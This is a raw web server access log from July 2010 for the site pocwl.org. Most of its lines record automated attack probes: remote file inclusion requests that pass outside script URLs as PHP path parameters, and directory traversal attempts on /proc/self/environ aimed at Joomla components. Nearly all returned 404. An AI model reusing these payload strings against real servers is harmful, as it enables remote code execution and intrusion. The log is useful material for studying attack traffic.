221.144.12.141 - - [30/Jul/2010:05:35:59 -0700] "GET /logs/access_100613.log//include/bbs.lib.inc.php?site_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
221.144.12.141 - - [30/Jul/2010:05:36:26 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
221.144.12.141 - - [30/Jul/2010:05:36:27 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
221.144.12.141 - - [30/Jul/2010:05:36:27 -0700] "GET /logs/access_100613.log//include/bbs.lib.inc.php?site_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
221.144.12.141 - - [30/Jul/2010:05:43:22 -0700] "GET /logs/access_100613.log%20%20//include/bbs.lib.inc.php?site_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
221.144.12.141 - - [30/Jul/2010:05:43:51 -0700] "GET /logs/access_100613.log%20%20//include/bbs.lib.inc.php?site_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
92.60.176.46 - - [30/Jul/2010:05:43:55 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.pocwl.org"
92.60.176.46 - - [30/Jul/2010:05:43:55 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.pocwl.org"
92.60.176.46 - - [30/Jul/2010:05:47:08 -0700] "GET /logs/access_100719.log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.pocwl.org"
92.60.176.46 - - [30/Jul/2010:05:47:08 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.pocwl.org"
92.60.176.46 - - [30/Jul/2010:05:47:09 -0700] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.pocwl.org"
92.60.176.46 - - [30/Jul/2010:05:47:36 -0700] "GET /logs/access_100719.log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.pocwl.org"
92.60.176.46 - - [30/Jul/2010:05:47:36 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.pocwl.org"
92.60.176.46 - - [30/Jul/2010:05:47:37 -0700] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.pocwl.org"
64.15.156.75 - - [30/Jul/2010:05:52:45 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
64.15.156.75 - - [30/Jul/2010:05:52:45 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
64.15.156.75 - - [30/Jul/2010:05:52:45 -0700] "GET /logs/access_100719.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
64.15.156.75 - - [30/Jul/2010:05:52:54 -0700] "GET /logs/access_100613.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
64.15.156.75 - - [30/Jul/2010:05:57:29 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
64.15.156.75 - - [30/Jul/2010:05:57:29 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
64.15.156.75 - - [30/Jul/2010:05:57:29 -0700] "GET /logs/access_100719.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
72.55.165.45 - - [30/Jul/2010:05:57:57 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
72.55.165.45 - - [30/Jul/2010:05:57:57 -0700] "GET /logs/access_100719.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
72.55.165.45 - - [30/Jul/2010:05:57:57 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
209.34.196.162 - - [30/Jul/2010:05:57:59 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.pocwl.org"
64.15.156.75 - - [30/Jul/2010:05:58:45 -0700] "GET /logs/access_100719.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
64.15.156.75 - - [30/Jul/2010:05:59:00 -0700] "GET /logs/access_100709.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
81.21.78.22 - - [30/Jul/2010:05:59:17 -0700] "GET /logs/access_100613.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.pocwl.org"
81.21.78.22 - - [30/Jul/2010:05:59:18 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.pocwl.org"
81.21.78.22 - - [30/Jul/2010:05:59:18 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.pocwl.org"
209.34.196.162 - - [30/Jul/2010:05:59:30 -0700] "GET /logs/access_100719.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.pocwl.org"
209.34.196.162 - - [30/Jul/2010:05:59:30 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.pocwl.org"
209.34.196.162 - - [30/Jul/2010:05:59:31 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.pocwl.org"
92.241.190.214 - - [30/Jul/2010:06:00:04 -0700] "GET /logs/access_100613.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.pocwl.org"
92.241.190.214 - - [30/Jul/2010:06:00:04 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.pocwl.org"
92.241.190.214 - - [30/Jul/2010:06:00:04 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.pocwl.org"
81.21.78.22 - - [30/Jul/2010:06:00:19 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.pocwl.org"
64.15.156.75 - - [30/Jul/2010:06:00:41 -0700] "GET /logs/access_100709.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
92.241.190.214 - - [30/Jul/2010:06:00:44 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.pocwl.org"
72.55.165.45 - - [30/Jul/2010:06:01:24 -0700] "GET /logs/access_100719.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
72.55.165.45 - - [30/Jul/2010:06:02:40 -0700] "GET /logs/access_100709.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
209.34.196.162 - - [30/Jul/2010:06:04:20 -0700] "GET /logs/access_100709.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.pocwl.org"
92.60.176.46 - - [30/Jul/2010:06:08:34 -0700] "GET /logs/access_100709.log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.pocwl.org"
92.60.176.46 - - [30/Jul/2010:06:08:44 -0700] "GET /logs/access_100709.log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.pocwl.org"
81.21.78.22 - - [30/Jul/2010:06:09:01 -0700] "GET /logs/access_100719.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.pocwl.org"
174.123.133.162 - - [30/Jul/2010:06:09:15 -0700] "GET /logs/access_100616.log%20%20///skin/zero_vote/error.php?dir=http://mall.yjecrc.or.kr//bbs/Template/Mobile/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.pocwl.org"
174.123.133.162 - - [30/Jul/2010:06:09:32 -0700] "GET /logs///skin/zero_vote/error.php?dir=http://mall.yjecrc.or.kr//bbs/Template/Mobile/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.pocwl.org"
174.123.133.162 - - [30/Jul/2010:06:09:36 -0700] "GET //skin/zero_vote/error.php?dir=http://mall.yjecrc.or.kr//bbs/Template/Mobile/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.pocwl.org"
72.55.165.45 - - [30/Jul/2010:06:09:37 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
72.55.165.45 - - [30/Jul/2010:06:09:38 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
174.123.133.162 - - [30/Jul/2010:06:09:38 -0700] "GET /logs/access_100624.log%20%20///skin/zero_vote/error.php?dir=http://mall.yjecrc.or.kr//bbs/Template/Mobile/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.pocwl.org"
72.55.165.45 - - [30/Jul/2010:06:09:41 -0700] "GET /logs/access_100719.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
72.55.165.45 - - [30/Jul/2010:06:10:09 -0700] "GET /logs/access_100613.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
38.117.96.153 - - [30/Jul/2010:06:12:44 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "pocwl.org"
38.117.96.153 - - [30/Jul/2010:06:12:44 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "pocwl.org"
71.71.54.208 - - [30/Jul/2010:06:12:55 -0700] "GET //?_PHPLIB[libdir]=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 200 1051 "-" "Mozilla/5.0" "www.pocwl.org"
71.71.54.208 - - [30/Jul/2010:06:14:35 -0700] "GET /logs/access_100709.log%20%20///?_PHPLIB[libdir]=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
92.241.190.214 - - [30/Jul/2010:06:14:50 -0700] "GET /logs/access_100719.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.pocwl.org"
64.15.156.75 - - [30/Jul/2010:06:19:23 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
64.15.156.75 - - [30/Jul/2010:06:19:23 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
64.15.156.75 - - [30/Jul/2010:06:19:26 -0700] "GET /logs/access_100613.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
64.15.156.75 - - [30/Jul/2010:06:19:28 -0700] "GET /logs/access_100719.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
72.55.165.45 - - [30/Jul/2010:06:20:11 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
72.55.165.45 - - [30/Jul/2010:06:20:11 -0700] "GET /logs/access_100613.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
72.55.165.45 - - [30/Jul/2010:06:20:12 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
209.34.196.162 - - [30/Jul/2010:06:20:12 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.filosocrate.it/methe/idd.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.pocwl.org"
72.55.165.45 - - [30/Jul/2010:06:20:22 -0700] "GET /logs/access_100719.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
188.165.213.8 - - [30/Jul/2010:06:41:51 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.pocwl.org"
71.71.54.208 - - [30/Jul/2010:06:42:28 -0700] "GET /logs/access.log///?_PHPLIB[libdir]=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.pocwl.org"
67.195.37.112 - - [30/Jul/2010:06:43:37 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.pocwl.org"
67.195.37.112 - - [30/Jul/2010:06:45:16 -0700] "GET /logs/?S=A HTTP/1.0" 200 922 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.pocwl.org"
174.142.75.205 - - [30/Jul/2010:06:47:44 -0700] "GET /logs/access_100719.log//components/com_weblinks/weblinks.class.php?mosConfig_absolute_path=http://studentclub.tku.edu.tw/~history/blog/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.pocwl.org"
174.142.75.205 - - [30/Jul/2010:06:47:44 -0700] "GET /components/com_weblinks/weblinks.class.php?mosConfig_absolute_path=http://studentclub.tku.edu.tw/~history/blog/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.pocwl.org"
174.142.75.205 - - [30/Jul/2010:06:47:44 -0700] "GET /logs//components/com_weblinks/weblinks.class.php?mosConfig_absolute_path=http://studentclub.tku.edu.tw/~history/blog/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.pocwl.org"
174.142.75.205 - - [30/Jul/2010:06:48:49 -0700] "GET /logs/access_100709.log//components/com_weblinks/weblinks.class.php?mosConfig_absolute_path=http://studentclub.tku.edu.tw/~history/blog/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.pocwl.org"
38.107.191.108 - - [30/Jul/2010:06:55:12 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.pocwl.org"
38.107.191.109 - - [30/Jul/2010:06:55:17 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.pocwl.org"
38.107.191.105 - - [30/Jul/2010:06:55:25 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "pocwl.org"
38.107.191.106 - - [30/Jul/2010:06:55:29 -0700] "GET /images/ HTTP/1.1" 200 526 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "pocwl.org"
38.107.191.107 - - [30/Jul/2010:06:55:38 -0700] "GET /logs/scripts.log HTTP/1.1" 200 40712 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.pocwl.org"